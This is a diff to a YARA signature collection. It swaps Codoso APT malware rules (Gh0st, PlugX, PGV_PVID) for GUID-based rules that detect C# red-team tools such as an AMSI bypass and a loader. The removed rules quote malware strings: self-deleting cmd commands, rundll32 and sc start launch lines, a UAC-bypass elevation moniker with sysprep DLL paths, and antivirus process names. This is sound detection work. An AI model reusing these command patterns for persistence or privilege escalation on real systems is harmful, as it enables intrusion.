-		description = "Detects Codoso APT PGV_PVID Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6d1d8490-fdcb-5263-ae00-0b436e822fc3"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L115-L129"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "e731d563-0d16-5f84-8127-624a71f8b646"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/r3nhat/GRAT2"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L752-L765"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4b16f6e8414d4192d0286b273b254fa1bd633f5d3d07ceebd03dfdfc32d0f17f"
-		logic_hash = "0907274bd6c97b7d7b2913e42aa748c92012aeeb32196ddcbcd30332f4e95ac9"
+		logic_hash = "535f24d46b317dc5c74779931deb92dd922a79cba4f48588763a3d717bbdec82"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "rundll32 \"%s\",%s" fullword ascii
-		$s1 = "/c ping 127.%d & del \"%s\"" fullword ascii
+		$typelibguid0lo = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Gh0St_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Powershdll : FILE
 {
 	meta:
-		description = "Detects Codoso APT Gh0st Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "55fb17c5-ee11-55be-9af3-e9fe8d6160b5"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L130-L151"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3f582a47-078e-525f-9d02-4ee7a455a3b2"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/p3nt4/PowerShdll"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L767-L780"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bf52ca4d4077ae7e840cf6cd11fdec0bb5be890ddd5687af5cfa581c8c015fcd"
-		logic_hash = "e24d434d8f08b83f8e4b1f4aa75a84a040e4f56cdbd9a58ff49c463437e78c24"
+		logic_hash = "0c2b4a2e3008605c35296d2064d4ab3dbb62230db57d1756f0c11e47a303c007"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "RunMeByDLL32" fullword ascii
-		$s1 = "svchost.dll" fullword wide
-		$s2 = "server.dll" fullword ascii
-		$s3 = "Copyright ? 2008" fullword wide
-		$s4 = "testsupdate33" fullword ascii
-		$s5 = "Device Protect Application" fullword wide
-		$s6 = "MSVCP60.DLL" fullword ascii
-		$s7 = "mail-news.eicp.net" fullword ascii
+		$typelibguid0lo = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 195KB and $x1 or 4 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Gh0St_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpamsibypass : FILE
 {
 	meta:
-		description = "Detects Codoso APT Gh0st Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5643d028-2a76-5bce-bf2f-8be706ab1fd5"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L152-L170"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "ca97004e-edc1-5b5a-ac67-e81ae24631aa"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/WayneJLee/CsharpAmsiBypass"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L782-L795"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
-		logic_hash = "5864e52820578769a31a6925795d13283d7b3bc5f9ac50ac8aea6578a5919e71"
+		logic_hash = "65daf297f51dd75ed3616504df96aea9b7a61aebd5a3b43c208f1709daedc193"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
-		$s1 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
-		$s13 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
-		$s14 = "%s -r debug 1" fullword ascii
-		$s15 = "\\\\.\\keymmdrv1" fullword ascii
-		$s17 = "RunMeByDLL32" fullword ascii
+		$typelibguid0lo = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Customtcp : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Hastyseries : FILE
 {
 	meta:
-		description = "Codoso CustomTCP Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b6ed6939-db0c-5a47-8839-3337d1bc1f6c"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L171-L188"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0d35acf4-c763-593c-94e2-c499d3826375"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/obscuritylabs/HastySeries"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L797-L819"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b95d7f56a686a05398198d317c805924c36f3abacbb1b9e3f590ec0d59f845d8"
-		logic_hash = "4f0333de25b9f84ecaa3e63c5f600f53929244cd63a681d21cb78cfe17ca15f9"
+		logic_hash = "4987c7afbf339a6a21634eb4647a0b09bfa149d330b7fb2aea2467a25e629c62"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "wnyglw" fullword ascii
-		$s5 = "WorkerRun" fullword ascii
-		$s7 = "boazdcd" fullword ascii
-		$s8 = "wayflw" fullword ascii
-		$s9 = "CODETABL" fullword ascii
+		$typelibguid0lo = "8435531d-675c-4270-85bf-60db7653bcf6" ascii wide
+		$typelibguid1lo = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii wide
+		$typelibguid2lo = "300c7489-a05f-4035-8826-261fa449dd96" ascii wide
+		$typelibguid3lo = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii wide
+		$typelibguid4lo = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii wide
+		$typelibguid5lo = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii wide
+		$typelibguid6lo = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii wide
+		$typelibguid7lo = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii wide
+		$typelibguid8lo = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii wide
+		$typelibguid9lo = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 405KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_5 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dreamprotectorfree : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0202d82c-c1f8-59f7-96b6-b21f21c1dc69"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L192-L208"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "9ebee989-3441-5a76-b243-08de978b541c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/Paskowsky/DreamProtectorFree"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L821-L834"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e248bada3ac46611bbe2cf1e1afee902191a2c1fb9611c4a052318e5e093b015"
+		logic_hash = "bd8a6373695b9ab69fdf9e7f4a65c2db4e7a5f6f04f6d308ec352322a396aa44"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash2 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$s1 = "/c del %s >> NUL" fullword ascii
-		$s2 = "%s%s.manifest" fullword ascii
+		$typelibguid0lo = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Gh0St_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Redsharp : FILE
 {
 	meta:
-		description = "Detects Codoso APT Gh0st Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "24d9e64c-4b35-5737-92ae-8ec391d494c7"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L209-L247"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2aa62d61-075c-5664-a7fc-2b9d84b954ed"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/padovah4ck/RedSharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L836-L849"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "799ae0946464e5b4980f792e525da9eec46aa7844ec977f892a80f58d8b22afd"
+		logic_hash = "b751bedba84e8fc253686a7acd33e46a96140f2903f99ce1df6b4932d475bf30"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841"
-		hash2 = "7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8"
-		hash3 = "d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297"
 
 	strings:
-		$x1 = "cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %s" fullword ascii
-		$x2 = "rundll32.exe \"%s\", RunMeByDLL32" fullword ascii
-		$x3 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" fullword wide
-		$x4 = "\\\\.\\keymmdrv1" fullword ascii
-		$s1 = "spideragent.exe" fullword ascii
-		$s2 = "AVGIDSAgent.exe" fullword ascii
-		$s3 = "kavsvc.exe" fullword ascii
-		$s4 = "mspaint.exe" fullword ascii
-		$s5 = "kav.exe" fullword ascii
-		$s6 = "avp.exe" fullword ascii
-		$s7 = "NAV.exe" fullword ascii
-		$c1 = "Elevation:Administrator!new:" wide
-		$c2 = "Global\\RUNDLL32EXITEVENT_NAME{12845-8654-543}" fullword ascii
-		$c3 = "\\sysprep\\sysprep.exe" wide
-		$c4 = "\\sysprep\\CRYPTBASE.dll" wide
-		$c5 = "Global\\TERMINATEEVENT_NAME{12845-8654-542}" fullword ascii
-		$c6 = "ConsentPromptBehaviorAdmin" fullword ascii
-		$c7 = "\\sysprep" wide
-		$c8 = "Global\\UN{5FFC0C8B-8BE5-49d5-B9F2-BCDC8976EE10}" fullword ascii
+		$typelibguid0lo = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 4 of ( $s* ) or 4 of ( $c* ) ) or 1 of ( $x* ) or 6 of ( $c* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_4 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_ESC : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c1c753a6-77b6-5bfb-89f9-16127c264fd0"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L248-L275"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "a57c47e8-62bf-5425-9735-35a3e3a0c218"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NetSPI/ESC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L851-L865"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f24100c0fe837511ce6144224eda397fed3931072e364f1b5be49c7bb4102aa4"
+		logic_hash = "0a8244145b25260912c8b1d2968fe33fb8497762a6d8f2bbb88a734346990d55"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash2 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
-		hash3 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
-		hash4 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
-		hash5 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$x1 = "dropper, Version 1.0" fullword wide
-		$x2 = "dropper" fullword wide
-		$x3 = "DROPPER" fullword wide
-		$x4 = "About dropper" fullword wide
-		$s1 = "Microsoft Windows Manager Utility" fullword wide
-		$s2 = "SYSTEM\\CurrentControlSet\\Services\\" ascii
-		$s3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify" fullword ascii
-		$s4 = "<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\"><trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3" ascii
-		$s5 = "<supportedOS Id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedOS>" fullword ascii
+		$typelibguid0lo = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii wide
+		$typelibguid1lo = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 900KB and 2 of ( $x* ) and 2 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_Plugx_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Csharp_Loader : FILE
 {
 	meta:
-		description = "Detects Codoso APT PlugX Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af777818-5cff-5571-b5e9-0f5a4c8b08ff"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L276-L294"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "bf0c3d93-cbea-54c7-b950-fd4e5a600d07"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/NYAN-x-CAT/Csharp-Loader"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L867-L880"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "34736c85699a94b1413e5f9934e1a55841e8296df61d558bccf2d477e545d156"
+		logic_hash = "aa1a176ce3dbf6ae43d921822d2ab1689a4bf74077fa2a9aa72534ab3cfa3ecc"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "0b8cbc9b4761ab35acce2aa12ba2c0a283afd596b565705514fd802c8b1e144b"
-		hash2 = "448711bd3f689ceebb736d25253233ac244d48cb766834b8f974c2e9d4b462e8"
-		hash3 = "fd22547497ce52049083092429eeff0599d0b11fe61186e91c91e1f76b518fe2"
 
 	strings:
-		$s1 = "GETPASSWORD1" fullword ascii
-		$s2 = "NvSmartMax.dll" fullword ascii
-		$s3 = "LICENSEDLG" fullword ascii
+		$typelibguid0lo = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_3
+rule SIGNATURE_BASE_HKTL_NET_GUID_Bantam : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08003dba-1201-5f74-9edd-ea321bb26e99"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L295-L314"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "0ed3f5e5-d954-51e2-b7fb-4c25ca3d9f10"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/gellin/bantam"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L882-L895"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "371a91b08747b8025baba79797baf9f29487f9c3541f27fc2c2716b531d30b54"
+		logic_hash = "2dce37cd31fa359658519bd50fbb335fc6fd82af5e78a4d86d173d3628e0951f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "126fbdcfed1dfb31865d4b18db2fb963f49df838bf66922fea0c37e06666aee1"
-		hash2 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash3 = "8a56b476d792983aea0199ee3226f0d04792b70a1c1f05f399cb6e4ce8a38761"
-		hash4 = "b2950f2e09f5356e985c38b284ea52175d21feee12e582d674c0da2233b1feb1"
-		hash5 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
-		hash6 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$x1 = "Copyright (C) Microsoft Corporation.  All rights reserved.(C) 2012" fullword wide
+		$typelibguid0lo = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii wide
 
 	condition:
-		$x1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_2 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptask : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e4c00806-3092-5ec2-844f-b638c31fa6a5"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L315-L337"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "2cdd1a15-c70c-5eea-b5a7-8b4a445b9323"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/jnqpblc/SharpTask"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L897-L910"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7eab3d398b5172127383047de7106a9713ec5b149f8e8ca1506b3382b007f648"
+		logic_hash = "c3f4ddf4ea9389e01611880a47f2a199938e9a5e0f05df4e7f772f7a9acedc61"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "13bce64b3b5bdfd24dc6f786b5bee08082ea736be6536ef54f9c908fd1d00f75"
-		hash2 = "b631553421aa17171cc47248adc110ca2e79eff44b5e5b0234d69b30cab104e3"
-		hash3 = "bc0b885cddf80755c67072c8b5961f7f0adcaeb67a1a5c6b3475614fd51696fe"
 
 	strings:
-		$s0 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SvcHost" fullword ascii
-		$s1 = "regsvr32.exe /s \"%s\"" fullword ascii
-		$s2 = "Help and Support" fullword ascii
-		$s3 = "netsvcs" fullword ascii
-		$s9 = "%SystemRoot%\\System32\\svchost.exe -k netsvcs" fullword ascii
-		$s10 = "winlogon" fullword ascii
-		$s11 = "System\\CurrentControlSet\\Services" fullword ascii
+		$typelibguid0lo = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 907KB and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_Codoso_PGV_PVID_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsplague : FILE
 {
 	meta:
-		description = "Detects Codoso APT PGV PVID Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9487773a-01d9-558e-8866-b8a8650996ba"
-		date = "2016-01-30"
-		modified = "2023-12-05"
-		reference = "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_codoso.yar#L339-L367"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "89729c43-ae01-5c1f-af04-06d7a6c4e7fc"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/RITRedteam/WindowsPlague"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L912-L925"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8cecf96c7732becf83eb900bc36fa44daee466da6b483ea4f8c25ae9aeffcb7b"
+		logic_hash = "01ad0621f2bb129fd963093b65cd054bc2a2e185f21041c779b02b1e63475a1c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		super_rule = 1
-		hash1 = "41a936b0d1fd90dffb2f6d0bcaf4ad0536f93ca7591f7b75b0cd1af8804d0824"
-		hash2 = "58334eb7fed37e3104d8235d918aa5b7856f33ea52a74cf90a5ef5542a404ac3"
-		hash3 = "934b87ddceabb2063b5e5bc4f964628fe0c63b63bb2346b105ece19915384fc7"
-		hash4 = "ce91ea20aa2e6af79508dd0a40ab0981f463b4d2714de55e66d228c579578266"
-		hash5 = "e770a298ae819bba1c70d0c9a2e02e4680d3cdba22d558d21caaa74e3970adf1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "DRIVERS\\ipinip.sys" fullword wide
-		$s1 = "TsWorkSpaces.dll" fullword ascii
-		$s2 = "%SystemRoot%\\System32\\wiaservc.dll" fullword wide
-		$s3 = "/selfservice/microsites/search.php?%016I64d" fullword ascii
-		$s4 = "/solutions/company-size/smb/index.htm?%016I64d" fullword ascii
-		$s5 = "Microsoft Chart ActiveX Control" fullword wide
-		$s6 = "MSChartCtrl.ocx" fullword wide
-		$s7 = "{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}" fullword ascii
-		$s8 = "WUServiceMain" fullword ascii
-		$s9 = "Cookie: pgv_pvid=" ascii
+		$typelibguid0lo = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 3 of them ) ) or 5 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-
-rule SIGNATURE_BASE_MAL_WIPER_Isaacwiper_Mar22_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Misc_Csharp : FILE
 {
 	meta:
-		description = "Detects IsaacWiper malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "97d8d8dd-db65-5156-8f97-56c620cf2d56"
-		date = "2022-03-03"
-		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ua_isaacwiper.yar#L3-L29"
+		description = "Detects c# red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d25fa706-2254-5a82-a961-f57a0daa447c"
+		date = "2020-12-13"
+		modified = "2025-08-15"
+		reference = "https://github.com/jnqpblc/Misc-CSharp"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L927-L941"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
